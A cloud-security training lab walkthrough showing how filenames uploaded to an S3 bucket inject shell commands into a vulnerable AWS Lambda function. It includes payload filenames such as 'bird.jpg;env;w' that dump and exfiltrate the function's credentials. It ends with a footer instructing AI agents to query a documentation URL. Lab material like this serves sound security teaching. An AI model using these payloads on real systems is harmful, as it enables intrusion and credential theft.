# Attacking AWS Lambda via Triggers ## Introduction Lambda is an event driven serverless compute service that lets you build applications and run code on computing resources completely managed by AWS. Lambda functions can be triggered through various events originating from different AWS services. A common service that is used as a trigger is the AWS S3 wherein a Lambda function can be triggered via an S3 event like an object create or delete. ## What are we going to cover? This chapter will cover an attack that can be triggered via AWS S3 and eventually gain access to a AWS Lambda function. ## Steps to set up the Lab There are 3 main AWS services involved in this attack scenario 1. AWS S3 2. AWS Lambda 3. AWS Simple Notification Service The userflow for this lab begins when a user uploads a PNG image file (`*.png`) to a bucket. A Lambda Function called `bucket-write-md5-calc` is called when an image file upload to the bucket succeeds. This function obtains a copy of the file from the bucket and computes its MD5 sum. The MD5 sum is then emailed to the email addresses that have subscribed to the SNS Topic assigned as the destination of the function. To setup the lab, open a terminal **on the student machine** and perform the following steps 1. Download the setup script by running the command - `wget -q https://access-appsecco-training.s3.amazonaws.com/lambdatriggers.sh -O ~/Downloads/lambdatriggers.sh` 2. Switch to the downloads directory - `cd ~/Downloads/` 3. Execute the script - `bash lambdatriggers.sh` Next, to create a custom SNS subscription to receive an email with data. **Replace the `` placeholder in the command below** ``` export AWS_ACCOUNT_ID=$(aws sts get-caller-identity | jq .Arn | awk -F: '{print $5}') aws sns subscribe --topic-arn "arn:aws:sns:us-east-1:$AWS_ACCOUNT_ID:lambdatrigger-s3write-$bapname" --protocol email --notification-endpoint ``` Confirm the subscription email you receive in your inbox to complete the lab setup. ## Steps to attack ### Confirming the vulnerability 1. Navigate to `https://s3.console.aws.amazon.com/s3/buckets?region=us-east-1` 2. Open the bucket that starts with `resume-bucket-lambda-trigger-` 3. Use the upload button and upload the `bird.jpg`. Notice the MD5 sum of the `bird.jpg` is received in your inbox. 4. To exploit the Lambda code, upload a file whose name contains special characters that can cause command injection in a vulnerable context. 5. Upload the `image.png;id;w` file (valid filename on Linux). 6. Notice the output of the `id` command is now sent to your inbox. ### Credential Exfiltration 1. Make a copy of `bird.jpg` but with a command to print environment variables. Do this using `cp bird.jpg 'bird.jpg;env;w` 2. Upload this new file to the Lambda function 3. Check your email You can configure the credentials like any other stolen credentials and perform other attacks starting with identifying what access you have and accessing other resources in AWS. ### Additional references * [Lambda Trigger with S3](https://docs.aws.amazon.com/lambda/latest/dg/with-s3-example.html) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xcriminal.gitbook.io/about-me/cloudsec/cloud-compute-with-aws/aws-serverless/lambda-trigger-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.